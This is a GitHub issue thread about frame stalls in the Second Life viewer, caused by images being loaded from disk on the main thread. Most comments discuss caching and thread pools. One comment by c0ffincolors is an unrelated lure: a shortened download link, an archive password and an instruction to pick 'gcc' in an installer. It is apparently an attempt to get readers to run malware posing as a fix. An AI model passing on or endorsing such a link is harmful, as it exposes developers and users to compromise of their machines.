### ISSUE TITLE
getImageFromFile causing frame stalls

### ISSUE THREAD

**Issue by RunitaiLinden** [secondlife/viewer#2431]
The viewer will often load images from disk in the main thread, causing frame stalls.  Identify which images are being loaded and cache them in memory at startup to avoid these frame stalls at runtime.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by nat-goodspeed** [comment]
For images we must load later, that could be delegated to a ThreadPool.

**Comment by Dan-Linden** [comment]
Is there anything specific to test for this change?

**Comment by AtlasLinden** [comment]
No testing required. Setting to Pending Release
